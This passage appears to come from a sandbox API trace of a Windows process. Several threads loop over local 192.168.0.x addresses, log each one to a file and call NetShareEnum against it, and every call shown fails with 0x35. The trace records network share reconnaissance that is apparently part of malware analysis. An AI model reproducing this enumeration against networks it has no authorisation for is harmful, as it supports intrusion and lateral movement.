entriesread=0x2d5fed4, totalentries=0x2d5fed0, resume_handle=0x2d5fecc | out: bufptr=0x2d5fedc, entriesread=0x2d5fed4, totalentries=0x2d5fed0, resume_handle=0x2d5fecc) returned 0x35 [0132.900] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.67", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.900] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.67", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.67", lpUsedDefaultChar=0x0) returned 14 [0132.900] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2d5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0132.900] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.901] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0132.901] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2d5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0132.901] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.901] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0132.901] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2d5fc54*=0x10, lpOverlapped=0x0) returned 1 [0132.915] NetShareEnum (in: servername="\\\\192.168.0.67", level=0x1, bufptr=0x2d5fedc, prefmaxlen=0xffffffff, entriesread=0x2d5fed4, totalentries=0x2d5fed0, resume_handle=0x2d5fecc | out: bufptr=0x2d5fedc, entriesread=0x2d5fed4, totalentries=0x2d5fed0, resume_handle=0x2d5fecc) returned 0x35 [0172.296] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.135", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0172.296] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.135", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.135", lpUsedDefaultChar=0x0) returned 15 [0172.296] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2d5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0172.296] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.296] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0172.296] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2d5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0172.296] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.296] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0172.296] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2d5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2d5fc54*=0x11, lpOverlapped=0x0) returned 1 [0172.326] NetShareEnum (in: servername="\\\\192.168.0.135", level=0x1, bufptr=0x2d5fedc, prefmaxlen=0xffffffff, entriesread=0x2d5fed4, totalentries=0x2d5fed0, resume_handle=0x2d5fecc | out: bufptr=0x2d5fedc, entriesread=0x2d5fed4, totalentries=0x2d5fed0, resume_handle=0x2d5fecc) returned 0x35 [0205.879] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.197", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.879] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.197", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.197", lpUsedDefaultChar=0x0) returned 15 [0205.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2d5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0205.879] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.879] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0205.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2d5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0205.879] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.879] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0205.879] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2d5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2d5fc54*=0x11, lpOverlapped=0x0) returned 1 [0205.884] NetShareEnum (in: servername="\\\\192.168.0.197", level=0x1, bufptr=0x2d5fedc, prefmaxlen=0xffffffff, entriesread=0x2d5fed4, totalentries=0x2d5fed0, resume_handle=0x2d5fecc | out: bufptr=0x2d5fedc, entriesread=0x2d5fed4, totalentries=0x2d5fed0, resume_handle=0x2d5fecc) returned 0x35 [0257.976] SetEvent (hEvent=0x1dc) returned 1 [0257.976] RtlExitUserThread (Status=0x0) Thread: id = 30 os_tid = 0xc04 [0088.179] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.9", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.179] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.9", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.9", lpUsedDefaultChar=0x0) returned 13 [0088.179] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2e9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.179] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.179] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.180] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2e9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.180] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.180] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.180] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x2e9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2e9fc54*=0xf, lpOverlapped=0x0) returned 1 [0088.181] NetShareEnum (in: servername="\\\\192.168.0.9", level=0x1, bufptr=0x2e9fedc, prefmaxlen=0xffffffff, entriesread=0x2e9fed4, totalentries=0x2e9fed0, resume_handle=0x2e9fecc | out: bufptr=0x2e9fedc, entriesread=0x2e9fed4, totalentries=0x2e9fed0, resume_handle=0x2e9fecc) returned 0x35 [0132.951] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.70", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.951] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.70", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.70", lpUsedDefaultChar=0x0) returned 14 [0132.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2e9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0132.951] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.951] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0132.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2e9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0132.951] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.951] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0132.951] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2e9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2e9fc54*=0x10, lpOverlapped=0x0) returned 1 [0132.955] NetShareEnum (in: servername="\\\\192.168.0.70", level=0x1, bufptr=0x2e9fedc, prefmaxlen=0xffffffff, entriesread=0x2e9fed4, totalentries=0x2e9fed0, resume_handle=0x2e9fecc | out: bufptr=0x2e9fedc, entriesread=0x2e9fed4, totalentries=0x2e9fed0, resume_handle=0x2e9fecc) returned 0x35 [0172.270] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.132", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0172.270] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.132", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.132", lpUsedDefaultChar=0x0) returned 15 [0172.270] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2e9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0172.270] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.270] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0172.270] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2e9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0172.271] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.271] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0172.271] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2e9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2e9fc54*=0x11, lpOverlapped=0x0) returned 1 [0172.274] NetShareEnum (in: servername="\\\\192.168.0.132", level=0x1, bufptr=0x2e9fedc, prefmaxlen=0xffffffff, entriesread=0x2e9fed4, totalentries=0x2e9fed0, resume_handle=0x2e9fecc | out: bufptr=0x2e9fedc, entriesread=0x2e9fed4, totalentries=0x2e9fed0, resume_handle=0x2e9fecc) returned 0x35 [0205.909] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.201", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.909] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.201", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.201", lpUsedDefaultChar=0x0) returned 15 [0205.909] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2e9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0205.909] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.909] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0205.909] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2e9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0205.910] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.910] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0205.910] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x2e9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2e9fc54*=0x22, lpOverlapped=0x0) returned 1 [0205.978] NetShareEnum (in: servername="\\\\192.168.0.201", level=0x1, bufptr=0x2e9fedc, prefmaxlen=0xffffffff, entriesread=0x2e9fed4, totalentries=0x2e9fed0, resume_handle=0x2e9fecc | out: bufptr=0x2e9fedc, entriesread=0x2e9fed4, totalentries=0x2e9fed0, resume_handle=0x2e9fecc) returned 0x35 [0257.958] SetEvent (hEvent=0x1dc) returned 1 [0257.958] RtlExitUserThread (Status=0x0) Thread: id = 31 os_tid = 0xc08 [0088.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.16", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.16", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.16", lpUsedDefaultChar=0x0) returned 14 [0088.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2fdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2fdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.262] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.262] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2fdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2fdfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.325] NetShareEnum (in: servername="\\\\192.168.0.16", level=0x1, bufptr=0x2fdfedc, prefmaxlen=0xffffffff, entriesread=0x2fdfed4, totalentries=0x2fdfed0, resume_handle=0x2fdfecc | out: bufptr=0x2fdfedc, entriesread=0x2fdfed4, totalentries=0x2fdfed0, resume_handle=0x2fdfecc) returned 0x35 [0144.103] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.81", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.103] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.81", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.81", lpUsedDefaultChar=0x0) returned 14 [0144.103] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2fdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.103] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.104] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.104] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2fdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.104] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.104] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.104] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2fdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2fdfc54*=0x10, lpOverlapped=0x0) returned 1 [0144.111] NetShareEnum (in: servername="\\\\192.168.0.81", level=0x1, bufptr=0x2fdfedc, prefmaxlen=0xffffffff, entriesread=0x2fdfed4, totalentries=0x2fdfed0, resume_handle=0x2fdfecc | out: bufptr=0x2fdfedc, entriesread=0x2fdfed4, totalentries=0x2fdfed0, resume_handle=0x2fdfecc) returned 0x35 [0178.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.180", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.180", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.180", lpUsedDefaultChar=0x0) returned 15 [0178.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2fdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.410] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.411] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2fdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.411] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.411] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 